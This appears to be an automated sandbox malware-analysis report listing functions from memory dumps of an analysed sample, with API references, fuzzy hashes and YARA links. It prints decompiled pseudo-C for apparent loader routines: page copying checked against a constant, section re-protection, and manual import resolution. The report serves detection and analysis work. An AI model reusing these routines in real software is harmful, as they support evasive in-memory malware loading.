Uniqueness Score: -1.00%

Function 00A714AD, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00A714AD(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				unsigned int _v16;
				intOrPtr _v20;
				char _v24;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				signed int _v48;
				signed int _v52;
				intOrPtr _t46;
				void* _t53;
				intOrPtr _t54;
				intOrPtr _t57;
				signed int _t66;
				intOrPtr _t68;
				intOrPtr _t83;
				void* _t84;

				_t83 =  *0xa730f0;
				_t46 = E00A71B54(_t83,  &_v24,  &_v16);
				_v20 = _t46;
				if(_t46 == 0) {
					asm("sbb ebx, ebx");
					_t66 =  ~( ~(_v16 & 0x00000fff)) + (_v16 >> 0xc);
					_t84 = _t83 + _v24;
					_v40 = _t84;
					_t53 = VirtualAlloc(0, _t66 << 0xc, 0x3000, 4); // executed
					_v28 = _t53;
					if(_t53 == 0) {
						_v20 = 8;
					} else {
						_v8 = _v8 & 0x00000000;
						if(_t66 <= 0) {
							_t54 =  *0xa73100;
						} else {
							_t68 = _a4;
							_t57 = _t53 - _t84;
							_t13 = _t68 + 0xa741a7; // 0xa741a7
							_v32 = _t57;
							_v36 = _t57 + _t13;
							_v12 = _t84;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								E00A71B1C(_v12 + _t57, _v12, (_v52 ^ _v48) - _v8 + _v24 + _a4 - 1, 0x400);
								_v12 = _v12 + 0x1000;
								_t54 =  *((intOrPtr*)(_v36 + 0xc)) -  *((intOrPtr*)(_v36 + 8)) +  *((intOrPtr*)(_v36 + 4));
								_v8 = _v8 + 1;
								 *0xa73100 = _t54;
								if(_v8 >= _t66) {
									break;
								}
								_t57 = _v32;
							}
						}
						if(_t54 != 0x69b25f44) {
							_v20 = 9;
						} else {
							memcpy(_v40, _v28, _v16);
						}
						VirtualFree(_v28, 0, 0x8000); // executed
					}
				}
				return _v20;
			}

0x00a714b4
0x00a714c4
0x00a714c9
0x00a714ce
0x00a714e3
0x00a714ea
0x00a714ef
0x00a71500
0x00a71503
0x00a71509
0x00a7150e
0x00a715c1
0x00a71514
0x00a71514
0x00a7151a
0x00a71589
0x00a7151c
0x00a7151c
0x00a7151f
0x00a71521
0x00a71529
0x00a7152c
0x00a7152f
0x00a71537
0x00a71542
0x00a71543
0x00a71544
0x00a71561
0x00a7156f
0x00a71576
0x00a71579
0x00a7157c
0x00a71584
0x00000000
0x00000000
0x00a71534
0x00a71534
0x00a71586
0x00a71593
0x00a715a8
0x00a71595
0x00a7159e
0x00a715a3
0x00a715b9
0x00a715b9
0x00a715c8
0x00a715ce

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00000000,00000000,?,00000000,?,?,?,?,?,?,00A71A1F,00000000), ref: 00A71503
memcpy.NTDLL(?,00A71A1F,?,?,?,?,?,?,?,00A71A1F,00000000,00000030,?,00000000), ref: 00A7159E
VirtualFree.KERNELBASE(00A71A1F,00000000,00008000,?,?,?,?,?,?,00A71A1F,00000000), ref: 00A715B9

Strings

Sep 21 2021, xrefs: 00A7153A

Memory Dump Source

Source File: 00000009.00000002.933660571.0000000000A71000.00000040.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000009.00000002.933646906.0000000000A70000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.933681023.0000000000A74000.00000040.00020000.sdmp Download File
Associated: 00000009.00000002.933695121.0000000000A76000.00000040.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Sep 21 2021
API String ID: 4010158826-1195158264
Opcode ID: 860c59fa586ab0d64664ef68065d6c420ea9e365840002082cfd17fdc42d0124
Instruction ID: 947927d8331419813866f47cb79cc6fc5160ca13072b36ece3c20b0e48e08b10
Opcode Fuzzy Hash: 860c59fa586ab0d64664ef68065d6c420ea9e365840002082cfd17fdc42d0124
Instruction Fuzzy Hash: 6B310C72E0021A9BDB04DF98DD81BAEB7B8FB44304F10C165E90ABB240D771AA46CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00C351D9, Relevance: 4.6, APIs: 3, Instructions: 141COMMON

Download Yara Rule

APIs

Part of subcall function 00C36300: GetLastError.KERNEL32(00000000,00000000,00000004,00C267A2,00000000,00000000,00000000,?,00C3A292,00000000,00000000,?,00DBAB34,00000000), ref: 00C36305
Part of subcall function 00C36300: SetLastError.KERNEL32(00000000,00DA88A0,000000FF,?,00C3A292,00000000,00000000,?,00DBAB34,00000000), ref: 00C363A3

_free.LIBCMT ref: 00C35288
_free.LIBCMT ref: 00C352B6
_free.LIBCMT ref: 00C352F9

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: _free$ErrorLast
String ID:
API String ID: 3291180501-0
Opcode ID: 2a60924e876d23ca8bdd92c480da021cb2ff81ee3b9f34e68a341cac71cdfd54
Instruction ID: 9d8ddb0434fe4b37bb15c95a740e8617606dc85daf7955cd99d33995744c0439
Opcode Fuzzy Hash: 2a60924e876d23ca8bdd92c480da021cb2ff81ee3b9f34e68a341cac71cdfd54
Instruction Fuzzy Hash: 1841AB31610A05AFD764DFACC881AAAB3F8FF49350B640A6DF415C73A1EB31ED109B50

Uniqueness

Uniqueness Score: -1.00%

Function 00C35338, Relevance: 4.6, APIs: 3, Instructions: 96COMMON

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 00C35364
__cftoe.LIBCMT ref: 00C35396
_free.LIBCMT ref: 00C353BC

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: __cftoe$_free
String ID:
API String ID: 1303422935-0
Opcode ID: 27dde9d9b59fc5466d1d7429bdaebe98626ea1f42f5c3e20cf56f77631de527a
Instruction ID: 0a3079f740712ea89bcc8af6f2674d32c54c8476940067c01ce44bc492f93c4a
Opcode Fuzzy Hash: 27dde9d9b59fc5466d1d7429bdaebe98626ea1f42f5c3e20cf56f77631de527a
Instruction Fuzzy Hash: 51210A72814708BBCF24AB959C06EDF7BA8DF85360F204226F925D50E1EE71CB00D6A1

Uniqueness

Uniqueness Score: -1.00%

Function 00A71BAE, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00A71BAE(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0xa73100;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x69b25f40,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x69b25f40;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x7c211d88 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x69b25f42;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x69b25f24;
					} else {
						_t54 = _t57 - 0x69b25f04;
					}
					goto L9;
				}
				goto L12;
			}

0x00a71bb8
0x00a71bc5
0x00a71bcb
0x00a71bd7
0x00a71be7
0x00a71be9
0x00a71bf1
0x00a71c86
0x00a71c8d
0x00000000
0x00000000
0x00000000
0x00a71bf7
0x00a71bf7
0x00a71bf7
0x00a71bfb
0x00000000
0x00000000
0x00a71c07
0x00a71c0b
0x00a71c2f
0x00a71c33
0x00a71c47
0x00a71c47
0x00a71c4d
0x00a71c5c
0x00a71c60
0x00a71c68
0x00a71c68
0x00a71c70
0x00a71c73
0x00a71c80
0x00000000
0x00000000
0x00000000
0x00000000
0x00a71c80
0x00a71c3b
0x00a71c3f
0x00a71c45
0x00000000
0x00000000
0x00000000
0x00a71c45
0x00a71c13
0x00a71c17
0x00a71c21
0x00a71c19
0x00a71c19
0x00a71c19
0x00000000
0x00a71c17
0x00000000

APIs

VirtualProtect.KERNEL32(00000000,?,?,?,?,?,00000000,?,?), ref: 00A71BE7
VirtualProtect.KERNEL32(00000000,?,?,?), ref: 00A71C5C
GetLastError.KERNEL32 ref: 00A71C62

Memory Dump Source

Source File: 00000009.00000002.933660571.0000000000A71000.00000040.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000009.00000002.933646906.0000000000A70000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.933681023.0000000000A74000.00000040.00020000.sdmp Download File
Associated: 00000009.00000002.933695121.0000000000A76000.00000040.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: 1f8bf4f0e9f0c34f6b663a97a268a90248bc385b2a2d4c128631ab7d0565129f
Instruction ID: 9f02227b1603bddc244a2631cd6deef14bf0d302f4dc27b61c505609941a1ebc
Opcode Fuzzy Hash: 1f8bf4f0e9f0c34f6b663a97a268a90248bc385b2a2d4c128631ab7d0565129f
Instruction Fuzzy Hash: 65214B7190020ADFCB19DBD9C881AB9F7F4FB18345F01845AD60AD7018E3B4AA65CB98

Uniqueness

Uniqueness Score: -1.00%

Function 6D842B2E, Relevance: 4.5, APIs: 3, Instructions: 30threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6D856256: GetLastError.KERNEL32(?,00000016,00000000,6D847140,00000016,?,6D8471A5,00000000,00000000,00000000,00000000,00000000,6D855B82,00000000,?,6D838B88), ref: 6D85625B
Part of subcall function 6D856256: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6D8471A5,00000000,00000000,00000000,00000000,00000000,6D855B82,00000000,?,6D838B88,00000000,00000000), ref: 6D8562F9

CloseHandle.KERNEL32(?,?,?,6D842C65,?,?,6D842AD7,00000000), ref: 6D842B5F
FreeLibraryAndExitThread.KERNEL32(?,?,?,?,6D842C65,?,?,6D842AD7,00000000), ref: 6D842B75
ExitThread.KERNEL32 ref: 6D842B7E

Memory Dump Source

Source File: 00000009.00000002.937929837.000000006D621000.00000020.00020000.sdmp, Offset: 6D620000, based on PE: true

Associated: 00000009.00000002.937918300.000000006D620000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.938383757.000000006D995000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.938562885.000000006DA80000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.938574118.000000006DA83000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.938585219.000000006DA87000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.938607289.000000006DA96000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.938617064.000000006DA9A000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.938627337.000000006DA9B000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorExitLastThread$CloseFreeHandleLibrary
String ID:
API String ID: 1991824761-0
Opcode ID: 6857591b3056941802e9c5129bcc809922016b63bf080b20b7f3d099f344e6ac
Instruction ID: d4b8a17a25ff2fa4f623ee5d2ff84e0a30d32e003f914d9bf9dacc6010915f68
Opcode Fuzzy Hash: 6857591b3056941802e9c5129bcc809922016b63bf080b20b7f3d099f344e6ac
Instruction Fuzzy Hash: 62F0FE3050860AAFDF215F75884CB7B3AA96F41365F16CF14F835CB1A0DF38D4918A95

Uniqueness

Uniqueness Score: -1.00%

Function 00C324DF, Relevance: 3.1, APIs: 2, Instructions: 119COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00C3254D
_free.LIBCMT ref: 00C3256D

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 8fa66102559eb24803a1731db7ccd6c94f84f84cb12a16c093a43f3c7955697f
Instruction ID: 53c85266ca20c9137000e4c67981f4ddae2ea099614b6b839a7ca215e2ae7529
Opcode Fuzzy Hash: 8fa66102559eb24803a1731db7ccd6c94f84f84cb12a16c093a43f3c7955697f
Instruction Fuzzy Hash: 0E41F536A102109FCB10EFB8C891A6EB3F6EF89710F1544A8E511EB341DB30EE02DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C6A380, Relevance: 3.1, APIs: 2, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,00000004,00000000), ref: 00C6A42E
VirtualProtect.KERNEL32(?,?,00000000,00000000), ref: 00C6A491

Memory Dump Source

Source File: 00000009.00000002.933940341.0000000000C6A000.00000040.00020000.sdmp, Offset: 00C6A000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 85ae0715d7ab57b3df0ced7f94a68b87e7c63a382ea35c79dcd000104e7c0ac3
Instruction ID: 870f8b141ddfe2ec27ad3aeeaa1f533ed808b8b34c590234a5d7900bdea99868
Opcode Fuzzy Hash: 85ae0715d7ab57b3df0ced7f94a68b87e7c63a382ea35c79dcd000104e7c0ac3
Instruction Fuzzy Hash: 0A41BFB1D10208AFDF10EFA4D886BEDBBB1FF08311F104069E510B62A1D7769A51DF51

Uniqueness

Uniqueness Score: -1.00%

Function 00C6A381, Relevance: 3.1, APIs: 2, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,00000004,00000000), ref: 00C6A42E
VirtualProtect.KERNEL32(?,?,00000000,00000000), ref: 00C6A491

Memory Dump Source

Source File: 00000009.00000002.933940341.0000000000C6A000.00000040.00020000.sdmp, Offset: 00C6A000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: fa9d4d00c6a42c362fd13d3d2bd7712f64104f774fb1810e33e118ff01a6acdd
Instruction ID: 4489f9ee5dc9c739a232a19955612b0fbabdc27b84e7cd4d1519a5bf8d923ee5
Opcode Fuzzy Hash: fa9d4d00c6a42c362fd13d3d2bd7712f64104f774fb1810e33e118ff01a6acdd
Instruction Fuzzy Hash: 3941BFB1D10208AFDF10EFA4D886BEDBBB1FF08311F104069E510B62A1D7759A51DF55

Uniqueness

Uniqueness Score: -1.00%

Function 00A71264, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A71264(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0xa73100;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x69b25f44;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x69b25ec5;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x69b25f44;
										}
										 *_v16 = _t55;
										_t58 = 0x593682f4 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x964da13a;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

0x00a71264
0x00a7126d
0x00a71272
0x00a71278
0x00a71281
0x00a71287
0x00a71289
0x00a7128c
0x00a71291
0x00a71298
0x00a71298
0x00a7129c
0x00a712a2
0x00a712a7
0x00000000
0x00000000
0x00a712ad
0x00a712b7
0x00a712b9
0x00a712bc
0x00a712bf
0x00a712c3
0x00a712cb
0x00a712cd
0x00a712d0
0x00a71338
0x00a71338
0x00a7133c
0x00000000
0x00000000
0x00a712d5
0x00a712db
0x00a712dd
0x00a712f0
0x00a712f3
0x00a712f3
0x00a712f3
0x00a712f7
0x00a712df
0x00a712df
0x00a712e7
0x00a712e9
0x00000000
0x00000000
0x00000000
0x00000000
0x00a712e9
0x00a712d7
0x00a712d7
0x00a712eb
0x00a712eb
0x00a712eb
0x00a712fa
0x00a712fd
0x00a712ff
0x00a71306
0x00a71301
0x00a71301
0x00a71301
0x00a7130e
0x00a71314
0x00a71316
0x00a71346
0x00a71318
0x00a71318
0x00a7131b
0x00a7131d
0x00a71325
0x00a71325
0x00a7132a
0x00a7132c
0x00a71333
0x00a71335
0x00a71335
0x00a71335
0x00000000
0x00a71335
0x00000000
0x00a71316
0x00a712c5
0x00a712c5
0x00a712c9
0x00000000
0x00000000
0x00a712c9
0x00a71349
0x00a71349
0x00a71350
0x00a71355
0x00000000
0x00000000
0x00a7135b
0x00a71366
0x00000000
0x00a71366
0x00a7135d
0x00a7135d
0x00a71363
0x00000000
0x00a71363
0x00a71291
0x00a71367
0x00a7136c

APIs

LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 00A7129C
GetProcAddress.KERNEL32(?,00000000), ref: 00A7130E

Memory Dump Source

Source File: 00000009.00000002.933660571.0000000000A71000.00000040.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000009.00000002.933646906.0000000000A70000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.933681023.0000000000A74000.00000040.00020000.sdmp Download File
Associated: 00000009.00000002.933695121.0000000000A76000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: 9bc93e87c50f796e0b3d63fe0fd9be901dbc9a820e4e9be4b8fce40898862731
Instruction ID: 5f5eea73b51347a79ac3289fa561a8668c9767d3cde19fb3f7c26ee8a4146ba7
Opcode Fuzzy Hash: 9bc93e87c50f796e0b3d63fe0fd9be901dbc9a820e4e9be4b8fce40898862731
Instruction Fuzzy Hash: 28311671A00206DBDB54CF99CC90AAEB7F8BF04351F24C569D909EB201E770EA41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A8B610, Relevance: 3.1, APIs: 2, Instructions: 65COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00A8B63B
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00A8B68A

Part of subcall function 00C19D30: _Yarn.LIBCPMT ref: 00C19D4F
Part of subcall function 00C19D30: _Yarn.LIBCPMT ref: 00C19D73

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID:
API String ID: 1908188788-0
Opcode ID: 6dd296e9bb43a31a2f43cbc269127109405db14efaad0aa44e78a25bbda775d6
Instruction ID: 6b871c1a5271762f10238d1ea8152a235f9a4b5e17a22ef204ec01fcf2065a47
Opcode Fuzzy Hash: 6dd296e9bb43a31a2f43cbc269127109405db14efaad0aa44e78a25bbda775d6
Instruction Fuzzy Hash: F611A0B1504B449FD720DF68C801B47BBF8EF19710F008A6EE89AC3B81D7B5A508CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00A713C4, Relevance: 3.1, APIs: 2, Instructions: 59
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A713C4() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				long _t25;
				int _t26;
				void* _t30;
				intOrPtr* _t32;
				signed int _t36;
				intOrPtr _t39;

				_t15 =  *0xa73104;
				if( *0xa730ec > 5) {
					_t16 = _t15 + 0xa740f9;
				} else {
					_t16 = _t15 + 0xa740b1;
				}
				E00A7136F(_t16, _t16);
				_t36 = 6;
				memset( &_v32, 0, _t36 << 2);
				if(E00A71862( &_v32,  &_v16,  *0xa73100 ^ 0xf7a71548) == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0xa730f8);
					_t8 = _t26 + 2; // 0x2
					_t11 = _t26 + _t8 + 8; // 0xa
					_t30 = E00A71E22(_t39, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t32 = _v36;
						 *_t32 = 0;
						if( *0xa730f8 == 0) {
							 *((short*)(_t32 + 4)) = 0;
						} else {
							E00A71EF4(_t44, _t32 + 4);
						}
					}
					_t25 = E00A71D7E(_v28); // executed
				}
				ExitThread(_t25);
			}

0x00a713ca
0x00a713db
0x00a713e5
0x00a713dd
0x00a713dd
0x00a713dd
0x00a713ec
0x00a713f5
0x00a713fa
0x00a71418
0x00a71474
0x00a7141a
0x00a71420
0x00a71426
0x00a71434
0x00a71438
0x00a7143f
0x00a71448
0x00a7144c
0x00a71452
0x00a71463
0x00a71454
0x00a7145a
0x00a7145a
0x00a71452
0x00a7146b
0x00a7146b
0x00a71476

APIs

lstrlenW.KERNEL32(?,?,?,?), ref: 00A71420
ExitThread.KERNEL32 ref: 00A71476

Memory Dump Source

Source File: 00000009.00000002.933660571.0000000000A71000.00000040.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000009.00000002.933646906.0000000000A70000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.933681023.0000000000A74000.00000040.00020000.sdmp Download File
Associated: 00000009.00000002.933695121.0000000000A76000.00000040.00020000.sdmp Download File

Similarity

API ID: ExitThreadlstrlen
String ID:
API String ID: 2636182767-0
Opcode ID: 412eb3934c2f25215b33335bedc9322d9c55daea247dc38d804bc822a22048c2
Instruction ID: cc077a94d242a7233f7ed5edd604b23ab7d94fb498ad54be1967184ab131083f
Opcode Fuzzy Hash: 412eb3934c2f25215b33335bedc9322d9c55daea247dc38d804bc822a22048c2
Instruction Fuzzy Hash: 4B11EF72104302ABDB11DBA8CC49E9B77ECAB08300F41C826F44DD7061EB30EA4A8B52

Uniqueness

Uniqueness Score: -1.00%

Function 6D842C58, Relevance: 3.1, APIs: 2, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6D842B2E: CloseHandle.KERNEL32(?,?,?,6D842C65,?,?,6D842AD7,00000000), ref: 6D842B5F
Part of subcall function 6D842B2E: FreeLibraryAndExitThread.KERNEL32(?,?,?,?,6D842C65,?,?,6D842AD7,00000000), ref: 6D842B75
Part of subcall function 6D842B2E: ExitThread.KERNEL32 ref: 6D842B7E

_free.LIBCMT ref: 6D856DCC
HeapReAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,6D842AD7,00000000), ref: 6D856E08

Memory Dump Source

Source File: 00000009.00000002.937929837.000000006D621000.00000020.00020000.sdmp, Offset: 6D620000, based on PE: true

Associated: 00000009.00000002.937918300.000000006D620000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.938383757.000000006D995000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.938562885.000000006DA80000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.938574118.000000006DA83000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.938585219.000000006DA87000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.938607289.000000006DA96000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.938617064.000000006DA9A000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.938627337.000000006DA9B000.00000002.00020000.sdmp Download File

Similarity

API ID: ExitThread$AllocCloseFreeHandleHeapLibrary_free
String ID:
API String ID: 4109078009-0
Opcode ID: 5aead273c6d81c27ff4e17635ce93b8723d4048be6d64bc3baa2f9dde6bb950d
Instruction ID: 8bab467862496945f60941556203732328a0e9e7ccc3bb0e7456d267b022e07d
Opcode Fuzzy Hash: 5aead273c6d81c27ff4e17635ce93b8723d4048be6d64bc3baa2f9dde6bb950d
Instruction Fuzzy Hash: D001D43251D21AF6DBA12A1ADC0DB6B3B6D9BC2BB4F124D26F9145A140DF33D83281E0

Uniqueness

Uniqueness Score: -1.00%

Function 00C37DB1, Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00C37DD2

Part of subcall function 00C37E1A: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00C37E4C

RtlReAllocateHeap.NTDLL(00000000,?,?,00000004), ref: 00C37E0E

Memory Dump Source

Source File: 00000009.00000002.933710037.0000000000A7F000.00000080.00020000.sdmp, Offset: 00A7F000, based on PE: false

Similarity

API ID: AllocateHeap$_free
String ID:
API String ID: 1482568997-0
Opcode ID: fea9f8c49d4403ad0fd6329fffa5ebfb0e5378619aac5bff05ea17844de3eea8
Instruction ID: 5ea8920cfc79677f7039018cc3c682e7a363d44cca99a0d4f6f67d4bc23d77ba
Opcode Fuzzy Hash: fea9f8c49d4403ad0fd6329fffa5ebfb0e5378619aac5bff05ea17844de3eea8
Instruction Fuzzy Hash: 61F0F672138116AACB322A2AAC00B7F3758AFD2770F180315F824AA590DF30CD00A1A1

Uniqueness

Uniqueness Score: -1.00%

Function 6D842A79, Relevance: 3.0, APIs: 2, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(6DA772C0,0000000C), ref: 6D842A8C
ExitThread.KERNEL32 ref: 6D842A93

Memory Dump Source

Source File: 00000009.00000002.937929837.000000006D621000.00000020.00020000.sdmp, Offset: 6D620000, based on PE: true

Associated: 00000009.00000002.937918300.000000006D620000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.938383757.000000006D995000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.938562885.000000006DA80000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.938574118.000000006DA83000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.938585219.000000006DA87000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.938607289.000000006DA96000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.938617064.000000006DA9A000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.938627337.000000006DA9B000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorExitLastThread
String ID:
API String ID: 1611280651-0
Opcode ID: 0d7400ecf28f8fee9544deafe27fd46995e2bf73cea9f533480c680e25c1fb01
Instruction ID: 0ab4b821f3a4c3f61d7f8609120b4019aae2d18d7d887769b2bb2f87d8ad7456
Opcode Fuzzy Hash: 0d7400ecf28f8fee9544deafe27fd46995e2bf73cea9f533480c680e25c1fb01
Instruction Fuzzy Hash: 23F08C7190C209AFDB20ABB8C80DA2E7B75FF06315F164D49E615AB251CB349950CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00AAA660, Relevance: 1.6, APIs: 1, Instructions: 91COMMON

Download Yara Rule

APIs

std::locale::_Init.LIBCPMT ref: 00AAA6EE

Part of subcall function 00C19C30: std::_Lockit::_Lockit.LIBCPMT ref: 00C19C42
Part of subcall function 00C19C30: std::locale::_Setgloballocale.LIBCPMT ref: 00C19C5D
Part of subcall function 00C19C30: _Yarn.LIBCPMT ref: 00C19C73
Part of subcall function 00C19C30: std::_Lockit::~_Lockit.LIBCPMT ref: 00C19CB3

